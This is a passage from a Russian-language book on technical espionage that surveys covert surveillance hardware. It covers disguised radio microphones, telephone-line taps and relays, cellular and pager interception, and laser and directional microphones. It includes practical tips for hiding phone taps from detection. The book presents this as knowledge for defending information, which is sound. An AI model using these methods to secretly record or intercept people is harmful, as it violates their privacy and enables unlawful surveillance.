Не работает от сети переменного тока и ограничен одновременно используется как тройник для бытовой аппаратуры.

 

Состав комплекта:

  • Портфель.
  • Индикатор излучений.
  • Приемник сигналов.
  • Антенна приемника.
  • Антенна индикатора.
  • Головные телефоны.
  • Радиомикрофон Р1 и Р2.
  • Радиомикрофон РЗ.
  • Радиомикрофон Р5 (Р6)
  • Элементы питания.
  • Шнур записи.

Комплект дополняется антеннами "волновой канал" или "бабочка". Из рисунка видно, что в состав входят несколько видов радиомикрофанов. Они отличаются мощностью передатчика: радиомикрофон Р2 имеет мощность излучения 15 мВт и дальность действия до 300 м, габариты - 58х51х15 мм, а РЗ, например, - мощность 3 мВт, дальность действия до 150 м и, соответственно, меньшие габариты - ЗЗх27х7 мм.

На рис. 1 .3 изображен радиомикрофон РЗ. Это радиомикрофон со встроенным микрофоном и проводниками для подключения внешнего электропитания 1.5В. Включение радиопередатчика производится в момент подсоединения внешнего электропитания. Корпус пластиковый, антенна гибкая. Несущая частота в диапазоне 350 - 450 МГц.

Мощность излучения 3 мВт. Дальность действия до 150 м. Габариты - ЗЗх27х7 мм.

Распространенным явлением является маскировка радиомикрофонов под какие-то устройства двойного назначения: зажигалки, калькуляторы, часы и т.д. В качестве примера на рис. 1.4 изображен радиомикрофон в виде авторучки.

Красивая шариковая авторучка может работать как радиомикрофон с дальностью до 200 м (рис. 1.4). Встроенный микрофон обеспечивает высококачественный акустический контроль. Электропитание от часовых батареек, непрерывно до 15 ч. Частоты фиксированные (канал А или В) в диапазоне 350-450 МГц. Габариты - длина 130 мм, диаметр 14 мм, вес- 20 г.

Интересными являются изделия САL-201 и САL-205, замаскированные под калькуляторы, с питанием от сети. Это позволяет заодно решить и проблему питания, т.к. встроенные аккумуляторы имеют возможность зарядки от сети. Существуют модели, выполненные в виде заколки или зажима для галстука, наручных часов и др., подключаемые к передатчику или магнитофону, в зависимости от цели операции. На рис. 1.5 приведены примеры таких моделей.

Высокочувствительные миниатюрные микрофоны в авторучке, наручных часах, в значке и др. позволяют записать важную беседу в шумном месте. Электропитание от часовой батарейки обеспечивает непрерывную работу встроенного усилителя в течении нескольких месяцев. С помощью миниатюрного микрофона с усилителем удобно контролировать помещения, например, через имеющиеся вентиляционные отверстия. К проводу, выходящему от такого микрофона в соседнее помещение, подключается либо радиопередатчик, либо магнитофон.

Для записи разработаны и широко представлены в продаже специальные магнитофоны. На рис. 1 .6 изображена одна из моделей - профессиональный микрокассетный магнитофон с автореверсом и системой VОХ (системой включения по голосу). Кроме того, эта модель оборудована встроенным микрофоном н счетчиком ленты и имеет две скорости записи. В полный комплект входит пульт дистанционного управления (ДУ), адаптер для электропитания от сети, наушники, микрокассета МС-60, чехол. Габариты - 73х52х20 мм, вес - 90 г.

Одна из возможных схем применения скрытого радиомикрофона и магнитофона изображена на рис. 1.7. Подобный "джентльменский набор" включает в себя микрофон с булавкой, телефон с ушным креплением, кнопку включения передатчика, а также разъемы для подключения к различным радиостанциям и магнитофонам. Вес - 55 г.

Такая схема позволяет агенту записать на магнитофон и передать на приемное устройство нужную информацию. Еще более интересной является схема оперативного применения радиомикрофона, реализованная в изделии SIPE-PS. Это комплект, состоящий из бесшумного пистолета с прицельным расстоянием 25 м и радиомикрофона-стрелы. Он предназначен для установки радиомикрофона в местах, физический доступ к которым невозможен.

Радиомикрофон в виде наконечника стрелы в ударопрочном исполнении надежно прикрепляется к поверхностям из любого материала - металла, дерева, бетона, пластмассы и т.д. Тактика применения его следующая: стрела отстреливается через, например, открытую форточку и прикрепляется к стене. В реальных условиях города дальность действия радиомикрофона не превышает 50 м, и это обстоятельство снижает оперативную ценность системы.

Аналогичный комплект фирмы CCS включает арбалет и несколько стрел-дротиков. Это модель STG 4301. Микрофон обеспечивает контроль разговора в радиусе до 10 м, а передатчик передает сигнал на приемник, находящийся на расстоянии до 100 м.

Как уже говорилось, ограничивающим фактором является питание. Для увеличения времени функционирования стараются увеличить емкость батарей, но этот путь имеет свои пределы. В качестве примера оригинального решения этой проблемы можно привести факт обнаружения сотрудниками одной из организаций, занимающейся защитой коммерческой информации, при проверке в одном из офисов радиомикрофона, установленного в макете парусного корабля. Сам макет был заполнен элементами питания на полтора года непрерывной работы. В качестве антенны использовался такелаж модели.

Широко практикуется применение радиомикрофонов с питанием от внешних источников, в том числе от телефонной и радиосети. Уже упоминались изделия CAL-201 и CAL-205. Можно сказать об отечественном приборе ЛСТ-4, устанавливаемом в розетках электропитания, и ЛСТ-51, устанавливаемом в телефонной розетке.

Оригинальной является модель HR560 LICHT WUD. Это радиомикрофон, встроенный в цоколь обыкновенной лампочки накаливания, с дальностью действия до 250 м.

Еще одна модель радиомикрофона, предназначенного для контроля помещений и устанавливаемого в телефонной розетке, показана на рис. 1.8. Это ЧМ радиомикрофон AD-45-3. Электропитание осуществляется от телефонной линии. Дальность - до 150 м. Габариты - 22х16х12 мм, вес - 210 г.

Нельзя не сказать о радиомикрофоне SIPE MT. Этот радиомикрофон с ЧМ передатчиком и с питанием от солнечной батареи выполнен в виде стакана для виски. Элементы солнечной батареи замаскированы орнаментом на дне стакана. Для повышения скрытности радиомикрофон имеет два режима: включен, если стакан стоит на столе, и отключен, если его поднять или изменить положение в пространстве.

Дальность действия передатчика в диапазоне 130-150 МГц составляет 100 м. Аналогичный прибоp фирмы CCS модели STG 4104 выполнен в виде керамической пепельницы, что следует признать наиболее удачным примером маскировки, хотя применение батарей, скрытых в покрытом войлоком дне пепельницы, и ограничивает время его непрерывной работы. Встроенный ртутный выключатель отключает передатчик, если пепельницу перевернуть. Применение батарей, а также более солидный вес пепельницы позволили увеличить радиус действия прибора до 600 м. Передатчик работает на частоте 130-150 МГц.

Одним из перспективных направлений увеличения скрытности и времени эффективного использования является применение дистанционного включения. Примерами являются изделия ТRМ-1530 и ТRМ-1532. Это радиомикрофоны с питанием от батарей, габаритами 87х54х70 мм, весом около 100 г, с ЧМ передатчиком диапазона 380-400 МГц или 100-150 МГц и дальностью до 300 м. Дистанционное включение-выключение позволяет довести время эффективной работы изделия до 1 года при времени непрерывной работы 280-300 часов.

Подобная аппаратура, но несколько больших габаритов, начинает поступать в продажу и от отечественных производителей. Очень перспективным является применение радиомикрофонов с активацией отзвука - музыки, речи и т.д. Такова модель STG-4001. Включение устройства происходит от звука, выключение - автоматически через 5 секунд после исчезновения звука. Применение функции включения по голосу позволило довести время эффективной работы до 300 часов. Прибор имеет очень приемлемые размеры - 20х38х12 мм, вес с батареями - 18 г, обеспечивает дальность до 500 м, частоты - 130-150 МГц. Следует подчеркнуть, что такого рода радиомикрофоны довольно трудно обнаружить.

В сложных случаях возможно построение системы передатчиков. Например, при движении объекта по пути следования заранее размещаются радиомикрофоны, работающие на разных частотах.

Наблюдение ведется при помощи многоканального приемника. Возможно построение схемы с использованием передатчика-ретранслятора. Мощность радиомикрофона делается очень небольшой (для увеличения времени работы и повышения скрытности), а на небольшом расстоянии, например, в соседнем помещении, устанавливается передатчик-ретранслятор, габариты и мощность которого подвергаются гораздо меньшим ограничениям.

Как уже говорилось выше, дальность действия радиопередатчиков определяется в существенной степени качествами радиоприемных устройств, прежде всего, чувствительностью. В качестве приемников часто используют бытовые радиоприемные устройства. В этом случае предпочтительным является применение магнитол, т.к. появляется возможность одновременного ведения записи. К недостаткам таких устройств относятся низкая чувствительность и возможность настройки посторонних лиц на частоту передатчика. Частично эти недостатки можно устранить перестройкой частотного диапазона, в том числе с помощью конверторов, а также переналадкой усилителей для повышения чувствительности. Достоинством таких систем является низкая стоимость, а также то, что они не вызывают подозрений. Но все же предпочтительным следует считать применение специальных приемных устройств.

Технические данные некоторых приемников, предназначенных для работы с радиомикрофонами, приведены в табл. 1.2. В качестве примера одного из таких устройств на рис. 1.9 изображен портативный приемник АД-17-2. Диапазон частот составляет 360-400 МГц. Приемник осуществляет автоматическое скайнрование и захват сигнала передатчика. Автоматическая подстройка частоты осуществляется в режиме приема. Применяется АРУ промежуточной частоты и АРУ сигнала низкой частоты. Чувствительность - не хуже 2 мкВ. Электропитание - 6-10 В от элементов типа АА. Сопротивление антенного входа - 50 Ом. Потребление - 3 ма. Амплитуда сигнала на низкочастотном выходе - 0,5 В. Габариты - 147х70х38 мм.

В качестве примера стационарного современного приемника коротко опишем радиоприемник ICOM R7100. Это многофункциональный сканирующий приемник, расчитанный на диапазон частот от 25 до 2000 МГц. Имеет возможность приема радиосигналов с любыми видами модуляции, в том числе контроль телевизионных сигналов на выносной видеомонитор, а также режимы ручной и автоматической настройки и сканирования. 999 каналов памяти разделены на 9 групп, что дает возможность сканирования по заранее выбранным группам каналов/частот. Оборудован системой автоматического поиска и записи в память значений обнаруженных частот и встроенными часами для управления рожимами работы по программе.

Имеется возможность управления всеми режимами от компьютера с помощью специальных программ. Чувствительность - от 0,35 до 1,6 мкВ, в зависимости от диапазона. Шаг настройки - от 0,1 до 1000 Гц. Имеются разъемы для подключения магнитофона, монитора и т.д.

Таблица 1.2. Технические данные приемников, предназначенных для работы с радиомикрофонами

N модели

Диапазон частот МгЦ

Чувствит. , пpи с/ш20дБ, мкВ

Пpогpамм. каналы

Фиксиp. каналы

Тип антенны

Сканиp. и автопоиск

Акустомат

Тип питания

Ток потpебл., мА

Габаpиты, мм

Вес,

кГ

2220

80-150

5

-

-

сетевой пpовод

-

-

сеть 50-110

1.0

160x90x45

0.25

2240

25-550

800-1300

0.35

1.0

20

-

Телескоп. внешний кабель

+

+

батаpея сеть адаптеp

60-700

470x390x130

8

2254

135-145

0.5

200

-

всенапpавл

-

+

батаpея сеть адаптеp

60-700

35ВА

470x390x180

330х130х280

8

8.5

2270

0.09-34

34-60

114-174

423-450

0.5-3

200

-

-

+

-

110/22012-16B

 

 

 

 

2301

25-550

800-1300

0.35

1

20

-

Телескоп. выносная

+

-

Адаптеp 12В

500

80х138х200

1.2

2303

380-440

0.5

-

2

встpоенная

-

-

15-40

125х60х20

0.18

2307

26-29,99

60-88

115-178

210-260

410-520

0.7

1.5

16

-

встpоенная

+

-

адапте p 6В

120-170

185х80х37

0.47

2308

60-89

118-136

140-174

0.7

1.5

20

-

встpоенная

+

-

Адаптеp 4В

100

145х65х44

0.56

2309

20-1000

1

30

-

активная пассивная

+

-

Батаpея адаптеp

500-800

188х71х212

3

2310

20-1000

0.5

100

-

-

+

-

110/220 батаpея

60Вт

433х132х465

15

 

Рис. 1.1 Обобщенная структурная схема радиомикрофона

Изображение: 

Рис. 1.2 Комплект акустического контроля АД-17 (США)

Изображение: 

Рис. 1.3 Радиомикрофон Р3 из комплекта АД-17

Изображение: 

Рис. 1.4 Радиомикрофон в виде авторучки

Изображение: 

Рис. 1.5 Замаскированные миниатюрные микрофоны

Изображение: 

Рис. 1.6 Микрокассетный магнитофон OLYMPUS L-400

Изображение: 

Рис. 1.7 Схема оперативного применения скрытого радиомикрофона и магнитофона

Изображение: 

Рис. 1.8 Радиомикрофон с питанием от телефонной сети

Изображение: 

Рис. 1.9 Портативный специальный приемник

Изображение: 

1.3. Устройства перехвата телефонных сообщений

1.3. Устройства перехвата телефонных сообщений

1.3.1. Основные методы прослушивания телефонных линий

Ценность информации, передаваемой по телефонным линиям , а также бытующее убеждение о массовом характере такого прослушивания вызывает наибольшее беспокойство у организаций и частных лиц за сохранение конфиденциальности своих переговоров именно по телефонным каналам. Для защиты своих секретов необходимо знать методы, с помощью которых могут быть осуществлены операции по перехвату. Но при этом нужно учесть, что организация массового прослушивания (в существовании которой убеждены очень многие) невозможна по причинам технического и финансового характера. В самом деле, для анализа записанных сообщений нужно держать огромное количество людей и техники. Как утверждает бывший глава КГБ В. Бакатин, 12 отдел КГБ прослушивал в Москве примерно 300 абонентов. Кроме того, для организации прослушивания в настоящее время требуется санкция прокуратуры. Более вероятна организация прослушивания без санкции, в коммерческих или других целях. По американским данным вероятность утечки информации по телефонным каналам составляет от 5 до 20%.

В настоящее время на рынке России представлены сотни типов устройств перехвата телефонных сообщений, как отечественных, так и импортных. Схема телефонной линии связи изображена на рис. 1.10.

Из этой схемы видно, что можно выделить шесть основных зон прослушивания:

  • телефонный аппарат;
  • линия от телефонного аппарата, включая распределительную коробку;
  • кабельная зона;
  • зона АТС;
  • зона многоканального кабеля;
  • зона радиоканала.

Наиболее вероятна организация прослушивания первых трех зон, т.к. именно в этих зонах легче всего подключиться к телефонной лизди.

Специалисты, занимающиеся защитой информации, утверждают, что чаще всего используется прослушивание с помощью параллельного аппарата. В большинстве случаев для этого даже не требуется прокладывать дополнительные провода - телефонная сеть настолько запутана, что всегда есть неиспользуемые линии. Кроме того, нетрудно подключится в парадной к распределительной коробке.

Подключение в третьей зоне менее распространено, т.к. необходимо проникать в систему телефонных коммуникаций, состоящую из труб с проложенными внутри них кабелями, а также разобраться в этой системе и опдеделить нужную пару среди сотен других. Однако не следует считать, что это невыполнимая задача, поскольку существует уже необходимая для этого аппаратура. В качестве примера можно привести американскую систему "Крот". С помощью специального индуктивного датчика, охватывающего кабель, снимается передаваемая по нему информация. Для установки датчика на кабель используются колодцы, через которые проходит кабель. Датчик в колодце укрепляется на кабеле и для затруднения обнаружения проталкивается в подводящую трубу. Сигнал записывается на диск специального магнитофона. После заполнения диска выдается сигнал, и агент, при благоприятных условиях, заменяет диск. Аппарат может записывать информацию, передаваемую одновременно по 60 каналам. Продолжительность непрерывной записи составляет 115 часов. Такие устройства находили в Москве. Для различных типов подземных кабелей разработаны разные датчики: для симметричных высокочастотных - индуктивные для отвода энергии с коаксиальных кабелей, для кабелей с избыточным давлением - устройства, исключающие его снижение. Некоторые приборы снабжаются радиопередатчиком для передачи записанных сообщений или перехвата их в реальном масштабе времени.

1.3.2. Способы подключения телефонной линии и запись переговоров

В техническом плане самым простым способом является контактное подключение. Возможно временное подключение к абонентской проводке с помощью стандартной "монтерской трубки". Однако подключение такого типа легко обнаруживается с помощью простейших средств контроля напряжения телефонной сети. Уменьшить эффект падения напряжения можно путем подключением телефонной трубки через резистор сопротивлением 0,6-1 кОм. Подключение осуществляется с помощью очень тонких иголочек и тонких, покрытых лаком, проводов, прокладываемых в какой-либо существующей или изготовленной щели. Щель может быть зашпаклевана и покрашена так, что визуально определить подключение очень тяжело.

Более совершенным является подключение с помощью согласующего устройства (рис. 1.11).

Такой способ существенно меньше снижает напряжение в телефонной сети и затрудняет обнаружение факта прослушивания. Известен способ подключения к линиям связи аппаратуры с компенсацией падения напряжения (рис. 1.12).

Существенными недостатками контактного способа подключения являются нарушение целостности проводов и влияние подключенного устройства на характеристики линий связи. В целях устранения этого недостатка применяется индуктивный датчик, выполненный в виде трансформатора. Один из таких датчиков изображен на рис. 1.13.

Существуют также датчики, принцип работы которых основан на эффекте Холла. В табл. 1.3 приведены характеристики датчиков адаптеров подключения к телефонной линии. Стоимость подобных устройств колеблется от 20 до 250 $. В качестве записывающих устройств применяются стандартные диктофоны, специальные миниатюрные, как уже упоминавшийся OLIMPUS L-400, а также стационарные многоканальные диктофоны, как, например, АД-25-1. Как правило, схема прослушивания организована так, что магнитофон включается при появлении сигнала в линии. В качестве примера миниатюрного магнитофона можно привести модель N2502, рекламируемую как магнитофон, который невозможно обнаружить с помощью современных детекторов записывающей техники. Этот магнитофон изображен на рис. 1.14.

В этом магнитофоне имеются гнезда для подключения внешнего микрофона, пульта дистанционного управления и головных телефонов.

Как правило, специальные многоканальные магнитофоны для записи телефонных переговоров используются в составе специальной аппаратуры для контроля особо режимных работ. В этом случае используются специальные приемы, позволяющие по ключевым словам прерывать или записывать телефонный разговор. Случаи коммерческого прослушивания на городских АТС крайне редки, так как это невозможно без наличия там "своего" человека из обслуживающего персонала.

Таблица 1.3. Адаптеры подключения к линии

Марка

Габаpитные pазмеpы

Питание

Дополнительные функции

ЛСТ-АД

45х35х5

автономное

Автоматическое вкл./выкл

БД-1

-

автономное

Индуктивный датчик

PRO-1213

95х58х25,

50х22х10

автономное 9В

Эффект Холла

UM-122

100х50х18

автономное 3В

Контактная игла

STG-4525

125х75х25

автономное 9В

Индуктивный зон

PK-135S

16х35

не требуется

Включение по голосу

 

Однако нельзя исключать случаев такого прослушивания на имеющихся и организуемых на некоторых предприятиях местных АТС. Такое прослушивание может быть организовано с помощью имеющихся на рынках США, Германии и Японии специальных многоканальных магнитофонов, предназначенных для стационарной записи телефонных переговоров и рассчитанных на значительное (от 10 до 100) число каналов.

Технические характеристики некоторых из таких устройств приведены в табл. 1.4.

Таблица 1.4. Технические характеристики записывающих устройств

Модель

Количество каналов

Габаpитные pазмеpы,мм

Вес, кг

Вpемя записи

Дополнительныефункции

PK-115-S

10

500х360х150

9.8

нет дан.

автоматичаское включение, подключение принтера, привязка ко времени

PK-100-55

1

10

50

100

209х1666х290

1100х550х380

110х890х660

7900х1890х600

2,9

60

220

430

4

10х4

50х4

100х4

Автоматическое включение. Подключение принтера. Привязка к дате и времени

АД-25

8

480х350х190

16

нет дан.

пpивязка ко вpемени дистанц. упpавление

ТМ

9

20

31

42

нет данных

нет дан.

До 1000

пpивязка к дате и вpемени видеоконтpоль

CU-1

10

нет данных

нет данных

нет данных

регистрация времени, даты, номера абонента, подсчет числа звонков

1.3.3. Телефонные радиоретрансляторы

Телефонные радиоретрансляторы чрезвычайно популярны и представляют собой радиоудлинители для передачи телефонных разговоров по радиоканалу. Обобщенная структурная схема подобного устройства приведена на рис. 1.15.

Большинство телефонных закладок автоматически включаются при поднятии телефонной трубки и передают информацию на пункт перехвата и записи. Источником питания для радиопередатчика является, как правило, напряжение телефонной сети. Так как в данном случае не требуется ни батареек, ни встроенного микрофона, размеры ретранслятора могут быть очень небольшими. Недостатком подобных устройств является то, что они могут быть обнаружены по радиоизлучению. На рис. 1.16 и 1.17 показаны примеры подобных устройств.

Малогабаритный кварцевый передатчик AD-31 предназначен для контроля телефонной линии. Дальность дейтвия - до 300 м и более. Диапазон частот - 350-450 МГц. Имеет каналы А, В или С. Включается в разрыв телефонной линии. Габариты - 18х38х10 мм, вес - 15 г.

Компактный ЧМ передатчик FD-45-4 для контроля телефонной линии. Закамуфлирован в телефонную розетку. Дальность действия - до 150 м. Габаритные размеры - 22х16х12 мм. Вес - 210 г. Чтобы уменьшить возможность обнаружения радиоизлучения, применяют тот же способ, что и в случае с радиомикрофоном - уменьшают мощность излучения передатчика, установленного на телефонной линии. А в безопасном месте устанавливают более мощный ретранслятор, переизлучающий сигнал на другой частоте и в зашифрованном виде.

Следует учесть, что нельзя исключать возможность применения радиопередатчиков, использующих псевдошумовые сигналы и (или) работающих "под шумами". В этом случае обнаружение радиозакладок еще более усложняется.

Для маскировки телефонные радиоретрансляторы выпускаются в виде конденсаторов, фильтров, реле и других стандартных узлов элементов, входящих в состав телефонной аппаратуры. Существуют ретрансляторы, выполненные в виде микрофона телефонной трубки (например, модель CRISTAL фирмы Sipe). Подобные изделия весьма легко и быстро можно установить в интересующий телефонный аппарат.

Здесь нельзя не сказать, что очень часто не требуется проделывать даже и такие простые операции. Очень распространены телефонные аппараты с кнопочным номеронабиранием типа ТА-Т, ТА-12. Благодаря особенностям своей конструкции они переизлучают информацию на десятках частот СВ, КВ и УКВ диапазона на расстояние до 200 м. Еще более просто подслушать разговор, если используется телефон с радиоудлинителем, представляющим собой две радиостанции: одна смонтирована в трубке, другая - в самом телефонном аппарате. В этом случае нужно только настроить приемник на требуемую частоту.

Для подобных целей выпускаются и специальные разведывательные приемники. Например, приемник "Минипорт" фирмы "Роде и Шварц" с диапазоном частот 20-1000 МГц. Этот приемник имеет небольшие габариты (188х74х212), универсальное питание и встроенный процессор. Запоминающее устройство может хранить в памяти до 30 значений частот и осуществлять сканирование в заданном диапазоне с переменным шагом .

1.3.4. Системы прослушивания сообщений, передаваемых по сотовым, пейджинговым каналам и по факсу

Сотовой называется система связи, состоящая из некоторого количества ячеек, которые, связываясь между собой, образуют сеть, или соты. Каждая ячейка может работать с определенным количеством абонентов одновременно. Сотовые сети имеют возможность наращивания, а также могут стыковаться друг с другом. Радиус действия базовой сотовой станции составляет 5-15 км, а перехват сообщений в этом случае, может проводиться на расстоянии до 50 км. В качестве примера реализации подобной системы можно привести сотовые системы наблюдения Cellmate-10В и Cellscan. Cellmate-106 контролирует одновремейно до 10 телефонных номеров, т.е. одну ячейку сотовой связи. Имеется возможность программируемого перебора ячеек. Нужный разговор может определяться по голосу абонента или по содержанию разговора. Перехваченные однажды номера при желании переводятся программой в особый режим наблюдения. Встроенное запоминающее устройство запоминает последние параметры настройки. Запись начинается автоматически, когда объект наблюдения начинает пользоваться телефоном. Информация о номерах телефонов, параметрах настройки, идентификации по голосу считывается с цветного жидкокристаллического дисплея, так же определяются коды доступа. Система Cellscan, аналогична по функциям Cellulate-10В и также размещается в атташе-кейсе. Утверждается, что количество программируемых номеров не ограничено. В режиме сканирования на дисплей выводится информация о 895 каналах. Наблюдается вся телефонная система, и выбираются каналы, по которым происходят звонки. С помощью комплекта сотовых карт определяется район, в котором происходит подозрительный разговор, идентифицированный сканером по содержанию или голосу. Можно отключить каналы, которые вы не хотите осуществлять перехват. Используется доработанный сотовый телефон ОКI, который может применяться и вкачестве обычного сотового телефона. Вес системы - 9 кг.

Современные системы сотовой связи могут использовать различные системы кодирования и (или) перестройку частоты по случайному закону. Существуют и специальные комплекты радиоперехвата с возможностью анализа зашифрованных сообщений, например, Sigint/Commt Spektra фирмы Hollandes Signal, но подобная аппаратура очень дорога. В России разработаны и предлагаются программно-аппаратные системы перехвата пейджинговых сообщений. В состав подобной системы входят доработанный сканер (AR-ЗОООА, IC-7100 и др.), устройство преобразования, компьютер и специальное программное обеспечение. Система позволяет осуществлять прием и декодирование текстовых и цифровых сообщений, передаваемых в системе радиопейджинговой связи и сохранять все принятые сообщения (с датой и временем передачи) на жестком диске персонального компьютера. При этом может производиться фильтрация потока сообщений, выделение данных, адресованных конкретным абонентам. На рис. 1.18 представлен пример реализации подобного устройства.

Перехват факс-сообщений принципиально не отличается от перехвата телефонных сообщений.

В заключение приведем пример организации прослушивания Агенством национальной безопасности США, имеющим в 6 раз больше служащих, чем ЦРУ. Четыре тысячи сто двадцать мощных центров прослушивания на базах в Германии, Турции, Японии и т.д., а также на кораблях, подводных лодках, самолетах и спутниках собирают и анализируют почти всю информацию, передаваемую электронным способом, включая излучения систем сигнализации автомобилей, квартир и т.д.

1.3.5. Использование телефонной линии для прослушивания помещений

Схема устройства, предназначенного для прослушивания помещений с использованием телефонной линии, приведена на рис. 1.19.

Как видно из рисунка, телефонная линия используется не только для передачи телефонных сообщений, но и для прослушивания помещения. Чтобы включить подобное устройство, нужно набрать номер абонента. Первые два гудка "проглатываются" устройством, т.е. телефон не звонит. После этого необходимо положить трубку и через определенное время (30-60 секунд) позвонить снова. Только после этого система включается в режим прослушивания.

Подобным образом работают, например, устройства ST-01 ELSY, UM103. Цена таких устройств - от 15 (отечественные) до 250 $ (зарубежные). В качестве примера одного из таких устройств на рис. 1.20 изображено устройство БОКС-Т. Это устройство позволяет контролировать помещение из любой точки земного шара по телефону.

Для этого достаточно набрать номер телефона, где уже установлен прибор "Бокс-Т", и произвести включение микрофона. Для выключения достаточно положить телефонную трубку. Модель TS-20-1 позволяет дополнительно контролировать подключенные к ней датчики охранной сигнализации. Модель TS-10-T2 включается с помощью блока вызова. Электропитание всех моделей осуществляется от телефонной линии с напряжением 60 В. Блок вызова модели TS20-T2 питается напряжением 9 В от батареи типа "Крона".

Необходимо иметь в виду, что существуют так называемые "беззаходовые" системы передачи акустической информации по телефонным линиям, позволяющие прослушивать помещения без установки какого-либо дополнительного оборудования. Также используются недостатки конструкции телефонного аппарата: акустические колебания воздействуют на якорь звонка, который, колеблясь, вызывает появление в катушке микротоков, модулированных речью. ЭДС, наводимая в катушке, в этом случае может достигать нескольких милливольт. Дальность этой системы не превышает (из-за затухания) нескольких десятков метров. Прием осуществляется на качественный, малошумящий усилитель низкой частоты.

Второй вариант "беззаходовой" системы связан с реализацией эффекта "навязывания". Колебания частотой от 150 кГц и выше подаются на один провод телефонной линии, ко второму проводу подсоединяется приемник. Земля передатчика и приемника соединены между собой или с общей землей, например, водопроводной сетью (рис. 1.21).

Через элементы схемы телефонного аппарата высокочастотные колебания поступают на микрофон, даже если он отключен от сети, и модулируются речью. Детектор приемника выделяет речевую информацию. Из-за существенного затухания ВЧ сигнала в двухпроводной линии дальность также не превышает нескольких десятков метров (без ретранслятора).

Рис. 1.10 Схема телефонной линии связи

Изображение: 

Рис. 1.11 Подключение с помощью согласующего устройства

Изображение: 

Рис. 1.12 Подключение с компенсацией напряжения

Изображение: 

Рис. 1.13 Индуктивный датчик

Изображение: 

Рис. 1.14 "Неуловимый" магнитофон

Изображение: 

Рис. 1.15 Структурная схема телефонного радиоретранслятора

Изображение: 

Рис. 1.16 Компактный телефонный радиоретранслятор

Изображение: 

Рис. 1.17 Телефонный радиоретранслятор, замаскированный по телефонную розетку

Изображение: 

Рис. 1.18 Программно-аппаратный комплекс перехвата пейджинговых сообщений

Изображение: 

Рис. 1.19 Схема прослушивания помещений по телефонной линии

Изображение: 

Рис. 1.20 Внешний вид и схема подключения устройства "Бокс-Т"

Изображение: 

Рис. 1.21 Схема прослушивания на эффекте "навязывания"

Изображение: 

1.4. Специальные устройства прослушивания

1.4. Специальные устройства прослушивания

1.4.1. Направленные микрофоны

Обычные микрофоны способны регистрировать человеческую речь на расстоянии, не превышающем нескольких десятков метров. Для увеличения дистанции, на которой можно производить прослушивание, практикуют применение направленного микрофона. Другими словами, это устройство собирает звуки только с одного направления, т.е. обладает узкой диаграммой направленности. Такие устройства широко применяются не только в разведке, но и журналистами, охотниками, спасателями и т.д.

Можно выделить два основных типа направленных микрофонов:

  • с параболическим отражателем;
  • резонансный микрофон.

Микрофон с параболическим отражателем

В микрофоне с параболическим отражателем собственно микрофон расположен в фокусе параболического отражателя звука. Направленный параболический микрофон с усилителем АD-9 концентрирует идущие звуки и усиливает их. Прост в обращении и настройке. В комплект входит микрофон, усилитель, кабель и головные телефоны. Электропитание - от батареи 9 В. Выпускаются несколькй моделей. Общим в конструкции всех этих микрофонов является наличие рукоятки пистолетного типа, параболического отражателя диаметром около 40 см и усилителя. Диапазон воспринимаемых частот составляет от 100-250 Гц до 15-18 кГц. Все микрофоны имеют автономное питание и имеют разъемы для подключения к магнитофону. Острая "игольчатая" диаграмма направленности позволяет при отсутствии помех контролировать человеческую речь на расстоянии до 1200 м. В реальных условиях (в условиях города) можно рассчитывать на дальность до 100 м.

Резонансный микрофон

Резонансный микрофон основан на использовании явления резонанса в металлических трубках разной длины. Например, в одной из модификаций такого микрофона используется набор из 37 трубок длиной от 1 до 92 см. Звуковые волны, приходящие к приемнику по осевому направлению, приходят к микрофону в одинаковой фазе, а с боковых направлений (по причине отличной скорости распространения звуковых волн в металле, а также разной длины трубок) - оказываются сдвинутыми по фазе. Так как подобные устройства на рынке практически не представлены, у авторов нет данных о преимуществах резонансных микрофонов.

С точки зрения скрытого контроля звука применение направленных микрофонов затруднено из-за зачастую неприемлемых их габаритов и источников акустических помех. Кроме того, для того, чтобы не быть прослушанным в автомобиле, достаточно просто поднять стекло.

1.4.2. Лазерные микрофоны

В том случае, если вы подняли стекло в автомобиле или закрыли форточку, может быть использован лазерный микрофон. Первые их образцы были приняты на вооружение американскими спецслужбами еще в 60-е годы. Структурная схема подобного устройства изображена на рис. 1.23.

В качестве примера рассмотрим лазерный микрофон НР-150 фирмы "Hewlett-Packard" с дальностью действия до 1000 м. Он сконструирован на основе гелий-неонового или полупроводникового лазера с длиной волны 0,63 мкм (т.е. в видимом диапазоне;современные устройства используют невидимый ИК диапазон).

Луч лазера, отраженный от стекла помещения, в котором ведутся переговоры, оказывается промодулированным звуковой частотой. Принятый фотоприемником отраженный луч детектируется, звук усиливается и записывается. Приемник и передатчик выполнены раздельно, имеется блок компенсации помех. Вся аппаратура размещена в кейсе и имеет автономное питание. Подобные системы имеют очень высокую стоимость (более 10 тыс.$) и, кроме того, требуют специального обучения персонала и использования компьютерной обработки речи для увеличения дальности.

Существует опытная отечественная система ЛСТ-ЛА2 с дальностью съема менее 100 м и достаточно скромной стоимостью. Следует отметить, что эффективность применения такой системы возрастает с уменьшением освещенности оперативного пространства.

1.4.3. Гидроакустические датчики

Звуковые волны распространяются в воде с очень небольшим затуханием. Гидроакустики ВМФ научились прослушивать шепот в подводных лодках, находящихся на глубине десятков метров. Этот же принцип можно применять, используя жидкость, находящуюся в системах водоснабжения и канализации. Такую информацию можно перехватывать в пределах здания, но радиус прослушивания будет очень сильно зависеть от уровня шумов, особенно в водопроводе.

Предпочтительнее использовать датчик, установленный в батарее отопления. Еще более эффективным будет использование гидроакустического передатчика, установленного в батарее прослушиваемого помещения.

Данных о применении в России подобных устройств в целях коммерческой разведки в настоящее время не имеется.

1.4.4. СВЧ и ИК передатчики

Для повышения скрытности в последние годы стали использовать инфракрасный канал. В качестве передатчика звука от микрофона используется полупроводниковый лазер. В качестве примера рассмотрим устройство ТRМ-1830. Дальность действия днем составляет 150 м, ночью - 400 м, время непрерывной работы - 20 часов. Габариты не превышают 26х22х20 мм. К недостаткам подобной системы можно отнести необходимость прямой видимости между передатчиком и приемником и влияние помех. Самое громкое дело с применением ИК канала - Уотергейт.

Повысить скрытность получения информации можно также с помощью использования канала СВЧ диапазона - более 10 ГГц. Передатчик, выполненный на диоде Ганца, может иметь очень небольшие габариты. В эксперименте, проведенном авторами, обеспечивалась дальность более 100 м. К преимуществам такой системы можно отнести отсутствие помех, простоту и отсутствие в настоящее время эффективных средств контроля. К недостаткам следует отнести необходимость прямой видимости, хотя и в меньшей степени, т.к. СВЧ сигнал может все-таки огибать небольшие препятствия и проходит (с ослаблением) сквозь тонкие диэлектрики, например, шторы на окнах. Данных о применении СВЧ канала в России у авторов не имеется.

1.4.5. Стетоскопы

